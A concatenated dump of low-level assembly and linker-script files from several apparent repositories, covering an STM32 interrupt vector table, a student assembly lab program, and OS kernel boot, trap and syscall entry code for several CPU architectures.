.thumb_set TIM1_BRK_TIM9_IRQHandler,Default_Handler
.weak TIM1_UP_TIM10_IRQHandler
.thumb_set TIM1_UP_TIM10_IRQHandler,Default_Handler
.weak TIM1_TRG_COM_TIM11_IRQHandler
.thumb_set TIM1_TRG_COM_TIM11_IRQHandler,Default_Handler
.weak TIM1_CC_IRQHandler
.thumb_set TIM1_CC_IRQHandler,Default_Handler
.weak TIM2_IRQHandler
.thumb_set TIM2_IRQHandler,Default_Handler
.weak TIM3_IRQHandler
.thumb_set TIM3_IRQHandler,Default_Handler
.weak TIM4_IRQHandler
.thumb_set TIM4_IRQHandler,Default_Handler
.weak I2C1_EV_IRQHandler
.thumb_set I2C1_EV_IRQHandler,Default_Handler
.weak I2C1_ER_IRQHandler
.thumb_set I2C1_ER_IRQHandler,Default_Handler
.weak I2C2_EV_IRQHandler
.thumb_set I2C2_EV_IRQHandler,Default_Handler
.weak I2C2_ER_IRQHandler
.thumb_set I2C2_ER_IRQHandler,Default_Handler
.weak SPI1_IRQHandler
.thumb_set SPI1_IRQHandler,Default_Handler
.weak SPI2_IRQHandler
.thumb_set SPI2_IRQHandler,Default_Handler
.weak USART1_IRQHandler
.thumb_set USART1_IRQHandler,Default_Handler
.weak USART2_IRQHandler
.thumb_set USART2_IRQHandler,Default_Handler
.weak USART3_IRQHandler
.thumb_set USART3_IRQHandler,Default_Handler
.weak EXTI15_10_IRQHandler
.thumb_set EXTI15_10_IRQHandler,Default_Handler
.weak RTC_Alarm_IRQHandler
.thumb_set RTC_Alarm_IRQHandler,Default_Handler
.weak OTG_FS_WKUP_IRQHandler
.thumb_set OTG_FS_WKUP_IRQHandler,Default_Handler
.weak TIM8_BRK_TIM12_IRQHandler
.thumb_set TIM8_BRK_TIM12_IRQHandler,Default_Handler
.weak TIM8_UP_TIM13_IRQHandler
.thumb_set TIM8_UP_TIM13_IRQHandler,Default_Handler
.weak TIM8_TRG_COM_TIM14_IRQHandler
.thumb_set TIM8_TRG_COM_TIM14_IRQHandler,Default_Handler
.weak TIM8_CC_IRQHandler
.thumb_set TIM8_CC_IRQHandler,Default_Handler
.weak DMA1_Stream7_IRQHandler
.thumb_set DMA1_Stream7_IRQHandler,Default_Handler
.weak FMC_IRQHandler
.thumb_set FMC_IRQHandler,Default_Handler
.weak SDIO_IRQHandler
.thumb_set SDIO_IRQHandler,Default_Handler
.weak TIM5_IRQHandler
.thumb_set TIM5_IRQHandler,Default_Handler
.weak SPI3_IRQHandler
.thumb_set SPI3_IRQHandler,Default_Handler
.weak UART4_IRQHandler
.thumb_set UART4_IRQHandler,Default_Handler
.weak UART5_IRQHandler
.thumb_set UART5_IRQHandler,Default_Handler
.weak TIM6_DAC_IRQHandler
.thumb_set TIM6_DAC_IRQHandler,Default_Handler
.weak TIM7_IRQHandler
.thumb_set TIM7_IRQHandler,Default_Handler
.weak DMA2_Stream0_IRQHandler
.thumb_set DMA2_Stream0_IRQHandler,Default_Handler
.weak DMA2_Stream1_IRQHandler
.thumb_set DMA2_Stream1_IRQHandler,Default_Handler
.weak DMA2_Stream2_IRQHandler
.thumb_set DMA2_Stream2_IRQHandler,Default_Handler
.weak DMA2_Stream3_IRQHandler
.thumb_set DMA2_Stream3_IRQHandler,Default_Handler
.weak DMA2_Stream4_IRQHandler
.thumb_set DMA2_Stream4_IRQHandler,Default_Handler
.weak CAN2_TX_IRQHandler
.thumb_set CAN2_TX_IRQHandler,Default_Handler
.weak CAN2_RX0_IRQHandler
.thumb_set CAN2_RX0_IRQHandler,Default_Handler
.weak CAN2_RX1_IRQHandler
.thumb_set CAN2_RX1_IRQHandler,Default_Handler
.weak CAN2_SCE_IRQHandler
.thumb_set CAN2_SCE_IRQHandler,Default_Handler
.weak OTG_FS_IRQHandler
.thumb_set OTG_FS_IRQHandler,Default_Handler
.weak DMA2_Stream5_IRQHandler
.thumb_set DMA2_Stream5_IRQHandler,Default_Handler
.weak DMA2_Stream6_IRQHandler
.thumb_set DMA2_Stream6_IRQHandler,Default_Handler
.weak DMA2_Stream7_IRQHandler
.thumb_set DMA2_Stream7_IRQHandler,Default_Handler
.weak USART6_IRQHandler
.thumb_set USART6_IRQHandler,Default_Handler
.weak I2C3_EV_IRQHandler
.thumb_set I2C3_EV_IRQHandler,Default_Handler
.weak I2C3_ER_IRQHandler
.thumb_set I2C3_ER_IRQHandler,Default_Handler
.weak OTG_HS_EP1_OUT_IRQHandler
.thumb_set OTG_HS_EP1_OUT_IRQHandler,Default_Handler
.weak OTG_HS_EP1_IN_IRQHandler
.thumb_set OTG_HS_EP1_IN_IRQHandler,Default_Handler
.weak OTG_HS_WKUP_IRQHandler
.thumb_set OTG_HS_WKUP_IRQHandler,Default_Handler
.weak OTG_HS_IRQHandler
.thumb_set OTG_HS_IRQHandler,Default_Handler
.weak DCMI_IRQHandler
.thumb_set DCMI_IRQHandler,Default_Handler
.weak FPU_IRQHandler
.thumb_set FPU_IRQHandler,Default_Handler
.weak SPI4_IRQHandler
.thumb_set SPI4_IRQHandler,Default_Handler
.weak SAI1_IRQHandler
.thumb_set SAI1_IRQHandler,Default_Handler
.weak SAI2_IRQHandler
.thumb_set SAI2_IRQHandler,Default_Handler
.weak QUADSPI_IRQHandler
.thumb_set QUADSPI_IRQHandler,Default_Handler
.weak CEC_IRQHandler
.thumb_set CEC_IRQHandler,Default_Handler
.weak SPDIF_RX_IRQHandler
.thumb_set SPDIF_RX_IRQHandler,Default_Handler
.weak FMPI2C1_EV_IRQHandler
.thumb_set FMPI2C1_EV_IRQHandler,Default_Handler
.weak FMPI2C1_ER_IRQHandler
.thumb_set FMPI2C1_ER_IRQHandler,Default_Handler
|
MrSnickersRUS/NSTUlab2 | 1,423 | lab2_task3/main.s | section .data
array dd 1, 2, 3, 5, 2
array_len equ ($ - array) / 4
result_msg db "Number of non-decreasing runs: ", 0
result_msg_len equ $ - result_msg
newline db 10, 0
newline_len equ $ - newline
buffer times 11 db 0
section .text
global _start
_start:
mov ecx, array_len
cmp ecx, 1
jle .special_cases
; Main logic
mov esi, array
mov ebx, 1 ; first run
mov ecx, array_len
dec ecx
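; A non-decreasing run ends whenever array[i] > array[i+1]:
; count one additional run per such descent.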
.compare_loop:
mov eax, [esi]
mov edx, [esi + 4]
cmp eax, edx
jle .next_element
inc ebx ; a new run begins
.next_element:
add esi, 4
loop .compare_loop
jmp .print_result
.special_cases:
mov ebx, ecx ; count is 0 or 1
jmp .print_result
.print_result:
; Print the message
push ebx ; save the run count: ebx is clobbered by the write syscall setup below
mov eax, 4
mov ebx, 1
mov ecx, result_msg
mov edx, result_msg_len
int 0x80
; Print the number
pop eax ; restore the run count into eax
call print_uint
; Print a trailing newline
mov eax, 4
mov ebx, 1
mov ecx, newline
mov edx, newline_len
int 0x80
.exit:
mov eax, 1
xor ebx, ebx
int 0x80
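; print_uint: write the unsigned integer in eax to stdout in decimal.
; Digits are generated backwards from the end of `buffer`.
; Clobbers eax, ebx, ecx, edx, edi.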
print_uint:
mov edi, buffer + 10
mov byte [edi], 0
mov ecx, 10
.convert_loop:
dec edi
xor edx, edx
div ecx
add dl, '0'
mov [edi], dl
test eax, eax
jnz .convert_loop
mov eax, 4
mov ebx, 1
mov ecx, edi
mov edx, buffer + 10
sub edx, edi
int 0x80
ret |
MukioXun/OSKernel_test | 2,386 | AstrancE/modules/axhal/linker.lds.S | OUTPUT_ARCH(%ARCH%)
BASE_ADDRESS = %KERNEL_BASE%;
ENTRY(_start)
SECTIONS
{
. = BASE_ADDRESS;
_skernel = .;
.text : ALIGN(4K) {
_stext = .;
*(.text.boot)
*(.text .text.*)
. = ALIGN(4K);
_etext = .;
}
_srodata = .;
.rodata : ALIGN(4K) {
*(.rodata .rodata.*)
*(.srodata .srodata.*)
*(.sdata2 .sdata2.*)
}
.init_array : ALIGN(0x10) {
__init_array_start = .;
*(.init_array .init_array.*)
__init_array_end = .;
}
. = ALIGN(4K);
_erodata = .;
.trampoline : ALIGN(4K) {
_strampoline = .;
*(.trampoline.*)
. = ALIGN(4K);
_etrampoline = .;
}
.data : ALIGN(4K) {
_sdata = .;
*(.data.boot_page_table)
. = ALIGN(4K);
*(.data .data.*)
*(.sdata .sdata.*)
*(.got .got.*)
}
.tdata : ALIGN(0x10) {
_stdata = .;
*(.tdata .tdata.*)
_etdata = .;
}
.tbss : ALIGN(0x10) {
_stbss = .;
*(.tbss .tbss.*)
*(.tcommon)
_etbss = .;
}
. = ALIGN(4K);
_percpu_start = .;
_percpu_end = _percpu_start + SIZEOF(.percpu);
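/* .percpu is linked at VMA 0 so each per-CPU symbol is a plain offset into
   a CPU's data block; AT(_percpu_start) keeps its load address in the image. */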
.percpu 0x0 : AT(_percpu_start) {
_percpu_load_start = .;
*(.percpu .percpu.*)
_percpu_load_end = .;
. = _percpu_load_start + ALIGN(64) * (%SMP% + 1); // add 1 since CPU hartid starts from 1
}
. = _percpu_end;
. = ALIGN(4K);
_edata = .;
.bss : AT(.) ALIGN(4K) {
boot_stack = .;
*(.bss.stack)
. = ALIGN(4K);
boot_stack_top = .;
_sbss = .;
*(.bss .bss.*)
*(.sbss .sbss.*)
*(COMMON)
. = ALIGN(4K);
_ebss = .;
}
_ekernel = .;
/DISCARD/ : {
*(.comment) *(.gnu*) *(.note*) *(.eh_frame*)
}
}
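/* Distributed-slice registries (linkme-style) and axns resources; the
   INSERT AFTER directive below splices this block in after .tbss. */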
SECTIONS {
linkme_IRQ : { *(linkme_IRQ) }
linkm2_IRQ : { *(linkm2_IRQ) }
linkme_PAGE_FAULT : { *(linkme_PAGE_FAULT) }
linkm2_PAGE_FAULT : { *(linkm2_PAGE_FAULT) }
linkme_SYSCALL : { *(linkme_SYSCALL) }
linkm2_SYSCALL : { *(linkm2_SYSCALL) }
linkme_PRE_TRAP : { *(linkme_PRE_TRAP) }
linkm2_PRE_TRAP : { *(linkm2_PRE_TRAP) }
linkme_POST_TRAP : { *(linkme_POST_TRAP) }
linkm2_POST_TRAP : { *(linkm2_POST_TRAP) }
axns_resource : { *(axns_resource) }
}
INSERT AFTER .tbss;
|
MukioXun/OSKernel_test | 4,325 | AstrancE/modules/axhal/src/platform/x86_pc/multiboot.S | # Bootstrapping from 32-bit with the Multiboot specification.
# See https://www.gnu.org/software/grub/manual/multiboot/multiboot.html
.section .text.boot
.code32
.global _start
_start:
mov edi, eax # arg1: magic: 0x2BADB002
mov esi, ebx # arg2: multiboot info
jmp bsp_entry32
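# Per the Multiboot spec, this header must lie within the first 8192 bytes
# of the OS image and be longword-aligned so the bootloader can find it.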
.balign 4
.type multiboot_header, STT_OBJECT
multiboot_header:
.int {mb_hdr_magic} # magic: 0x1BADB002
.int {mb_hdr_flags} # flags
.int -({mb_hdr_magic} + {mb_hdr_flags}) # checksum
.int multiboot_header - {offset} # header_addr
.int _skernel - {offset} # load_addr
.int _edata - {offset} # load_end
.int _ebss - {offset} # bss_end_addr
.int _start - {offset} # entry_addr
# Common code in 32-bit, prepare states to enter 64-bit.
.macro ENTRY32_COMMON
# set data segment selectors
mov ax, 0x18
mov ss, ax
mov ds, ax
mov es, ax
mov fs, ax
mov gs, ax
# set PAE, PGE bit in CR4
mov eax, {cr4}
mov cr4, eax
# load the temporary page table
lea eax, [.Ltmp_pml4 - {offset}]
mov cr3, eax
# set LME, NXE bit in IA32_EFER
mov ecx, {efer_msr}
mov edx, 0
mov eax, {efer}
wrmsr
# set protected mode, write protect, paging bit in CR0
mov eax, {cr0}
mov cr0, eax
.endm
# Common code in 64-bit
.macro ENTRY64_COMMON
# clear segment selectors
xor ax, ax
mov ss, ax
mov ds, ax
mov es, ax
mov fs, ax
mov gs, ax
.endm
.code32
bsp_entry32:
lgdt [.Ltmp_gdt_desc - {offset}] # load the temporary GDT
ENTRY32_COMMON
ljmp 0x10, offset bsp_entry64 - {offset} # 0x10 is code64 segment
.code32
.global ap_entry32
ap_entry32:
ENTRY32_COMMON
ljmp 0x10, offset ap_entry64 - {offset} # 0x10 is code64 segment
.code64
bsp_entry64:
ENTRY64_COMMON
# set RSP to boot stack
movabs rsp, offset {boot_stack}
add rsp, {boot_stack_size}
# call rust_entry(magic, mbi)
movabs rax, offset {entry}
call rax
jmp .Lhlt
.code64
ap_entry64:
ENTRY64_COMMON
# set RSP to high address (already set in ap_start.S)
mov rax, {offset}
add rsp, rax
# call rust_entry_secondary(magic)
mov rdi, {mb_magic}
movabs rax, offset {entry_secondary}
call rax
jmp .Lhlt
.Lhlt:
hlt
jmp .Lhlt
.section .rodata
.balign 8
.Ltmp_gdt_desc:
.short .Ltmp_gdt_end - .Ltmp_gdt - 1 # limit
.long .Ltmp_gdt - {offset} # base
.section .data
.balign 16
.Ltmp_gdt:
.quad 0x0000000000000000 # 0x00: null
.quad 0x00cf9b000000ffff # 0x08: code segment (base=0, limit=0xfffff, type=32bit code exec/read, DPL=0, 4k)
.quad 0x00af9b000000ffff # 0x10: code segment (base=0, limit=0xfffff, type=64bit code exec/read, DPL=0, 4k)
.quad 0x00cf93000000ffff # 0x18: data segment (base=0, limit=0xfffff, type=32bit data read/write, DPL=0, 4k)
.Ltmp_gdt_end:
.balign 4096
.Ltmp_pml4:
# 0x0000_0000 ~ 0xffff_ffff
.quad .Ltmp_pdpt_low - {offset} + 0x3 # PRESENT | WRITABLE | paddr(tmp_pdpt)
.zero 8 * 255
# 0xffff_8000_0000_0000 ~ 0xffff_8000_ffff_ffff
.quad .Ltmp_pdpt_high - {offset} + 0x3 # PRESENT | WRITABLE | paddr(tmp_pdpt)
.zero 8 * 255
# FIXME: may not work on macOS using hvf as the CPU does not support 1GB page (pdpe1gb)
.Ltmp_pdpt_low:
.quad 0x0000 | 0x83 # PRESENT | WRITABLE | HUGE_PAGE | paddr(0x0)
.quad 0x40000000 | 0x83 # PRESENT | WRITABLE | HUGE_PAGE | paddr(0x4000_0000)
.quad 0x80000000 | 0x83 # PRESENT | WRITABLE | HUGE_PAGE | paddr(0x8000_0000)
.quad 0xc0000000 | 0x83 # PRESENT | WRITABLE | HUGE_PAGE | paddr(0xc000_0000)
.zero 8 * 508
.Ltmp_pdpt_high:
.quad 0x0000 | 0x83 # PRESENT | WRITABLE | HUGE_PAGE | paddr(0x0)
.quad 0x40000000 | 0x83 # PRESENT | WRITABLE | HUGE_PAGE | paddr(0x4000_0000)
.quad 0x80000000 | 0x83 # PRESENT | WRITABLE | HUGE_PAGE | paddr(0x8000_0000)
.quad 0xc0000000 | 0x83 # PRESENT | WRITABLE | HUGE_PAGE | paddr(0xc000_0000)
.zero 8 * 508
|
MukioXun/OSKernel_test | 1,965 | AstrancE/modules/axhal/src/platform/x86_pc/ap_start.S | # Boot application processors into the protected mode.
# Each non-boot CPU ("AP") is started up in response to a STARTUP
# IPI from the boot CPU. Section B.4.2 of the Multi-Processor
# Specification says that the AP will start in real mode with CS:IP
# set to XY00:0000, where XY is an 8-bit value sent with the
# STARTUP. Thus this code must start at a 4096-byte boundary.
#
# Because this code sets DS to zero, it must sit
# at an address in the low 2^16 bytes.
.equ pa_ap_start32, ap_start32 - ap_start + {start_page_paddr}
.equ pa_ap_gdt, .Lap_tmp_gdt - ap_start + {start_page_paddr}
.equ pa_ap_gdt_desc, .Lap_tmp_gdt_desc - ap_start + {start_page_paddr}
.equ stack_ptr, {start_page_paddr} + 0xff0
.equ entry_ptr, {start_page_paddr} + 0xff8
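# stack_ptr and entry_ptr are two slots at the end of this page; the BSP
# presumably stores the AP's stack pointer and entry address there before
# sending the STARTUP IPI (both are read in ap_start32 below).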
# 0x6000
.section .text
.code16
.p2align 12
.global ap_start
ap_start:
cli
wbinvd
xor ax, ax
mov ds, ax
mov es, ax
mov ss, ax
mov fs, ax
mov gs, ax
# load the 64-bit GDT
lgdt [pa_ap_gdt_desc]
# switch to protected-mode
mov eax, cr0
or eax, (1 << 0)
mov cr0, eax
# far jump to 32-bit code. 0x8 is code32 segment selector
ljmp 0x8, offset pa_ap_start32
.code32
ap_start32:
mov esp, [stack_ptr]
mov eax, [entry_ptr]
jmp eax
.balign 8
# .type multiboot_header, STT_OBJECT
.Lap_tmp_gdt_desc:
.short .Lap_tmp_gdt_end - .Lap_tmp_gdt - 1 # limit
.long pa_ap_gdt # base
.balign 16
.Lap_tmp_gdt:
.quad 0x0000000000000000 # 0x00: null
.quad 0x00cf9b000000ffff # 0x08: code segment (base=0, limit=0xfffff, type=32bit code exec/read, DPL=0, 4k)
.quad 0x00af9b000000ffff # 0x10: code segment (base=0, limit=0xfffff, type=64bit code exec/read, DPL=0, 4k)
.quad 0x00cf93000000ffff # 0x18: data segment (base=0, limit=0xfffff, type=32bit data read/write, DPL=0, 4k)
.Lap_tmp_gdt_end:
# 0x7000
.p2align 12
.global ap_end
ap_end:
|
MukioXun/OSKernel_test | 1,791 | AstrancE/modules/axhal/src/arch/loongarch64/trap.S | .macro SAVE_REGS, from_user
move $t0, $sp
.if \from_user == 1
csrrd $sp, KSAVE_KSP // restore kernel sp
addi.d $sp, $sp, -{trapframe_size}
STD $tp, $sp, 2
STD $r21, $sp, 21
csrrd $tp, KSAVE_TP
csrrd $r21, KSAVE_R21
.else
addi.d $sp, $sp, -{trapframe_size}
.endif
STD $t0, $sp, 3
csrrd $t0, KSAVE_TEMP
PUSH_GENERAL_REGS
csrrd $t1, LA_CSR_PRMD
csrrd $t2, LA_CSR_ERA
STD $t1, $sp, 32 // prmd
STD $t2, $sp, 33 // era
.endm
.macro RESTORE_REGS, from_user
.if \from_user == 1
csrwr $tp, KSAVE_TP
csrwr $r21, KSAVE_R21
LDD $tp, $sp, 2
LDD $r21, $sp, 21
addi.d $t1, $sp, {trapframe_size}
csrwr $t1, KSAVE_KSP // save kernel sp
.endif
LDD $t1, $sp, 33 // era
LDD $t2, $sp, 32 // prmd
csrwr $t1, LA_CSR_ERA
csrwr $t2, LA_CSR_PRMD
POP_GENERAL_REGS
LDD $sp, $sp, 3
.endm
.section .text
.balign 4096
.global exception_entry_base
exception_entry_base:
csrwr $t0, KSAVE_TEMP
csrrd $t0, LA_CSR_PRMD
andi $t0, $t0, 0x3
bnez $t0, .Lfrom_userspace
.Lfrom_kernel:
SAVE_REGS 0
move $a0, $sp
addi.d $a1, $zero, 0
bl loongarch64_trap_handler
RESTORE_REGS 0
ertn
.Lfrom_userspace:
SAVE_REGS 1
move $a0, $sp
addi.d $a1, $zero, 1
bl loongarch64_trap_handler
RESTORE_REGS 1
ertn
.section .text
.balign 4096
.global handle_tlb_refill
handle_tlb_refill:
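# Hardware-assisted refill: each lddir descends one page-directory level,
# ldpte loads the even/odd PTE pair, and tlbfill installs both entries.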
csrwr $t0, LA_CSR_TLBRSAVE
csrrd $t0, LA_CSR_PGD
lddir $t0, $t0, 3
lddir $t0, $t0, 2
lddir $t0, $t0, 1
ldpte $t0, 0
ldpte $t0, 1
tlbfill
csrrd $t0, LA_CSR_TLBRSAVE
ertn
|
MukioXun/OSKernel_test | 2,358 | AstrancE/modules/axhal/src/arch/riscv/trap.S | .macro SAVE_REGS, from_user
addi sp, sp, -{trapframe_size}
PUSH_GENERAL_REGS
csrr t0, sepc
csrr t1, sstatus
csrrw t2, sscratch, zero // save sscratch (sp) and zero it
STR t0, sp, 31 // tf.sepc
STR t1, sp, 32 // tf.sstatus
STR t2, sp, 1 // tf.regs.sp
.if \from_user == 1
LDR t0, sp, 2 // load supervisor gp
LDR t1, sp, 3 // load supervisor tp
STR gp, sp, 2 // save user gp and tp
STR tp, sp, 3
mv gp, t0
mv tp, t1
.endif
.endm
.macro RESTORE_REGS, from_user
.if \from_user == 1
LDR t1, sp, 2 // load user gp and tp
LDR t0, sp, 3
STR gp, sp, 2 // save supervisor gp
STR tp, sp, 3 // save supervisor tp
mv gp, t1
mv tp, t0
addi t0, sp, {trapframe_size} // put supervisor sp to scratch
csrw sscratch, t0
.endif
// restore sepc
LDR t0, sp, 31
csrw sepc, t0
// restore sstatus, but don't change FS
LDR t0, sp, 32 // t0 = sstatus to restore
csrr t1, sstatus // t1 = current sstatus
li t2, 0x6000 // t2 = mask for FS
and t1, t1, t2 // t1 = current FS
not t2, t2 // t2 = ~(mask for FS)
and t0, t0, t2 // t0 = sstatus to restore(cleared FS)
or t0, t0, t1 // t0 = sstatus to restore with current FS
csrw sstatus, t0 // restore sstatus
POP_GENERAL_REGS
LDR sp, sp, 1 // load sp from tf.regs.sp
.endm
.section .text
.balign 4
.global trap_vector_base
trap_vector_base:
// sscratch == 0: trap from S mode
// sscratch != 0: trap from U mode
csrrw sp, sscratch, sp // swap sscratch and sp
bnez sp, .Ltrap_entry_u
csrr sp, sscratch // put supervisor sp back
j .Ltrap_entry_s
.Ltrap_entry_s:
SAVE_REGS 0
mv a0, sp
li a1, 0
call riscv_trap_handler
RESTORE_REGS 0
sret
.Ltrap_entry_u:
SAVE_REGS 1
mv a0, sp
li a1, 1
call riscv_trap_handler
RESTORE_REGS 1
sret
|
MukioXun/OSKernel_test | 1,397 | AstrancE/modules/axhal/src/arch/x86_64/syscall.S | .section .text
.code64
syscall_entry:
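// The SYSCALL instruction leaves the return RIP in rcx and the saved
// RFLAGS in r11; both are pushed below to rebuild an iretq-style frame.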
swapgs // switch to kernel gs
mov gs:[offset __PERCPU_USER_RSP_OFFSET], rsp // save user rsp
mov rsp, gs:[offset __PERCPU_TSS + {tss_rsp0_offset}] // switch to kernel stack
sub rsp, 8 // skip user ss
push gs:[offset __PERCPU_USER_RSP_OFFSET] // user rsp
push r11 // rflags
push {ucode64} // cs
push rcx // rip
sub rsp, 4 * 8 // skip until general registers
push r15
push r14
push r13
push r12
push r11
push r10
push r9
push r8
push rdi
push rsi
push rbp
push rbx
push rdx
push rcx
push rax
mov rdi, rsp
call x86_syscall_handler
pop rax
pop rcx
pop rdx
pop rbx
pop rbp
pop rsi
pop rdi
pop r8
pop r9
pop r10
pop r11
pop r12
pop r13
pop r14
pop r15
add rsp, 9 * 8
mov rcx, [rsp - 5 * 8] // rip
mov r11, [rsp - 3 * 8] // rflags
mov rsp, [rsp - 2 * 8] // user rsp
swapgs
sysretq
|
MukioXun/OSKernel_test | 1,627 | AstrancE/modules/axhal/src/arch/x86_64/trap.S | .equ NUM_INT, 256
.altmacro
.macro DEF_HANDLER, i
.Ltrap_handler_\i:
.if \i == 8 || (\i >= 10 && \i <= 14) || \i == 17
# error code pushed by CPU
push \i # interrupt vector
jmp .Ltrap_common
.else
push 0 # fill in error code in TrapFrame
push \i # interrupt vector
jmp .Ltrap_common
.endif
.endm
.macro DEF_TABLE_ENTRY, i
.quad .Ltrap_handler_\i
.endm
.section .text
.code64
_trap_handlers:
.set i, 0
.rept NUM_INT
DEF_HANDLER %i
.set i, i + 1
.endr
.Ltrap_common:
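# Stack here: vector, error code, then the CPU-pushed RIP/CS/RFLAGS (plus
# RSP/SS on a privilege change); [rsp + 3 * 8] is the saved CS, whose low
# two bits give the previous privilege level.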
test byte ptr [rsp + 3 * 8], 3 # swap GS if it comes from user space
jz 1f
swapgs
1:
sub rsp, 16 # reserve space for fs_base
push r15
push r14
push r13
push r12
push r11
push r10
push r9
push r8
push rdi
push rsi
push rbp
push rbx
push rdx
push rcx
push rax
mov rdi, rsp
call x86_trap_handler
pop rax
pop rcx
pop rdx
pop rbx
pop rbp
pop rsi
pop rdi
pop r8
pop r9
pop r10
pop r11
pop r12
pop r13
pop r14
pop r15
add rsp, 16 # pop fs_base
test byte ptr [rsp + 3 * 8], 3 # swap GS back if return to user space
jz 2f
swapgs
2:
add rsp, 16 # pop vector, error_code
iretq
.section .rodata
.global trap_handler_table
trap_handler_table:
.set i, 0
.rept NUM_INT
DEF_TABLE_ENTRY %i
.set i, i + 1
.endr
|
MukioXun/OSKernel_test | 2,989 | AstrancE/modules/axhal/src/arch/aarch64/trap.S | .macro SAVE_REGS
sub sp, sp, {trapframe_size}
stp x0, x1, [sp]
stp x2, x3, [sp, 2 * 8]
stp x4, x5, [sp, 4 * 8]
stp x6, x7, [sp, 6 * 8]
stp x8, x9, [sp, 8 * 8]
stp x10, x11, [sp, 10 * 8]
stp x12, x13, [sp, 12 * 8]
stp x14, x15, [sp, 14 * 8]
stp x16, x17, [sp, 16 * 8]
stp x18, x19, [sp, 18 * 8]
stp x20, x21, [sp, 20 * 8]
stp x22, x23, [sp, 22 * 8]
stp x24, x25, [sp, 24 * 8]
stp x26, x27, [sp, 26 * 8]
stp x28, x29, [sp, 28 * 8]
str x30, [sp, 30 * 8]
mrs x9, sp_el0
mrs x10, tpidr_el0
mrs x11, elr_el1
mrs x12, spsr_el1
stp x9, x10, [sp, 31 * 8]
stp x11, x12, [sp, 33 * 8]
# restore kernel tpidr_el0
mrs x1, tpidrro_el0
msr tpidr_el0, x1
# We may have interrupted userspace, or a guest, or exit-from or
# return-to either of those. So we can't trust sp_el0, and need to
# restore it.
bl {cache_current_task_ptr}
.endm
.macro RESTORE_REGS
# backup kernel tpidr_el0
mrs x1, tpidr_el0
msr tpidrro_el0, x1
ldp x11, x12, [sp, 33 * 8]
ldp x9, x10, [sp, 31 * 8]
msr sp_el0, x9
msr tpidr_el0, x10
msr elr_el1, x11
msr spsr_el1, x12
ldr x30, [sp, 30 * 8]
ldp x28, x29, [sp, 28 * 8]
ldp x26, x27, [sp, 26 * 8]
ldp x24, x25, [sp, 24 * 8]
ldp x22, x23, [sp, 22 * 8]
ldp x20, x21, [sp, 20 * 8]
ldp x18, x19, [sp, 18 * 8]
ldp x16, x17, [sp, 16 * 8]
ldp x14, x15, [sp, 14 * 8]
ldp x12, x13, [sp, 12 * 8]
ldp x10, x11, [sp, 10 * 8]
ldp x8, x9, [sp, 8 * 8]
ldp x6, x7, [sp, 6 * 8]
ldp x4, x5, [sp, 4 * 8]
ldp x2, x3, [sp, 2 * 8]
ldp x0, x1, [sp]
add sp, sp, {trapframe_size}
.endm
.macro INVALID_EXCP, kind, source
.p2align 7
SAVE_REGS
mov x0, sp
mov x1, \kind
mov x2, \source
bl invalid_exception
b .Lexception_return
.endm
.macro HANDLE_SYNC, source
.p2align 7
SAVE_REGS
mov x0, sp
mov x1, \source
bl handle_sync_exception
b .Lexception_return
.endm
.macro HANDLE_IRQ, source
.p2align 7
SAVE_REGS
mov x0, sp
mov x1, \source
bl handle_irq_exception
b .Lexception_return
.endm
.section .text
.p2align 11
.global exception_vector_base
exception_vector_base:
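// 16 vectors, 0x80 bytes apart: four exception kinds for each of four sources.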
// current EL, with SP_EL0
INVALID_EXCP 0 0
INVALID_EXCP 1 0
INVALID_EXCP 2 0
INVALID_EXCP 3 0
// current EL, with SP_ELx
HANDLE_SYNC 1
HANDLE_IRQ 1
INVALID_EXCP 2 1
INVALID_EXCP 3 1
// lower EL, aarch64
HANDLE_SYNC 2
HANDLE_IRQ 2
INVALID_EXCP 2 2
INVALID_EXCP 3 2
// lower EL, aarch32
INVALID_EXCP 0 3
INVALID_EXCP 1 3
INVALID_EXCP 2 3
INVALID_EXCP 3 3
.Lexception_return:
RESTORE_REGS
eret
|
MusicalArtist12/basic-os-rust | 2,287 | src/kernel/boot/init.s | .global start
.section .init, "ax", @progbits
.code32
.extern stack_top
start:
cli
mov %ebx, %edi // pass multiboot address information to _start
movl $stack_top, %esp
call check_multiboot
call check_cpuid
call check_longmode
call setup_page_tables
call enable_paging
lgdt (gdt64_pointer)
movw $gdt64_data_offset, %ax
movw %ax, %ds
movw %ax, %es
movw %ax, %fs
movw %ax, %gs
movw %ax, %ss
ljmp $gdt64_code_offset, $fix_cs
fix_cs:
jmp _start
hlt
check_multiboot:
cmp $0x36d76289, %eax
jne multiboot_fail
ret
check_cpuid:
pushfl // AT&T mnemonic (pushfd is Intel syntax)
pop %eax
// make a copy and store into %ecx
mov %eax, %ecx
xor $1 << 21, %eax // try to flip the ID bit
push %eax
popfl
pushfl
pop %eax
push %ecx
popfl // restore the original flags
xor %eax, %ecx
jz cpuid_fail // jump if the ID bit could not be flipped (eax == ecx)
ret
check_longmode:
mov $0x80000000, %eax // '$' makes this an immediate, not a memory load
cpuid
cmp $0x80000001, %eax
jb longmode_fail // jump if leaf 0x80000001 is unsupported
mov $0x80000001, %eax
cpuid
test $1 << 29, %edx // long mode (LM) feature bit
jz longmode_fail
ret
setup_page_tables:
movl $p3_table, %eax
or $0b11, %eax
movl %eax, (p4_table)
movl $p2_table, %eax
or $0b11, %eax
movl %eax, (p3_table)
movl $0, %ecx
.map_p2_table:
movl $0x200000, %eax
mul %ecx
orl $0b10000011, %eax
movl %eax, p2_table(,%ecx, 8)
inc %ecx
cmp $512, %ecx
jne .map_p2_table
movl $p4_table, %eax
or $0b11, %eax
movl %eax, p4_table + 511 * 8 // AT&T syntax: recursive entry, last P4 slot maps the table itself
ret
enable_paging:
movl $p4_table, %eax
movl %eax, %cr3
movl %cr4, %eax
orl $1 << 5, %eax
mov %eax, %cr4
mov $0xC0000080, %ecx
rdmsr
orl $1 << 8, %eax
wrmsr
movl %cr0, %eax
orl $1 << 31, %eax
mov %eax, %cr0
ret
.equ vga_start, 0xb8000
cpuid_fail:
movl $0x4f504f43, vga_start
movl $0x4f494f55, vga_start + 4
movl $0x00004f44, vga_start + 8
hlt
longmode_fail:
movl $0x4f4f4f4c, vga_start
movl $0x4f474f4e, vga_start + 4
movl $0x4f444f4d, vga_start + 8
hlt
multiboot_fail:
movl $0x4f554f4d, vga_start
movl $0x4f544f4c, vga_start + 4
movl $0x4f424f49, vga_start + 8
movl $0x4f4f4f4f, vga_start + 12
movl $0x4f0a4f54, vga_start + 16
hlt
|
Mwneees/New | 4,165 | crates/fiber/src/unix/s390x.S | // A WORD OF CAUTION
//
// This entire file basically needs to be kept in sync with itself. It's not
// really possible to modify just one bit of this file without understanding
// all the other bits. Documentation tries to reference various bits here and
// there but try to make sure to read over everything before tweaking things!
//
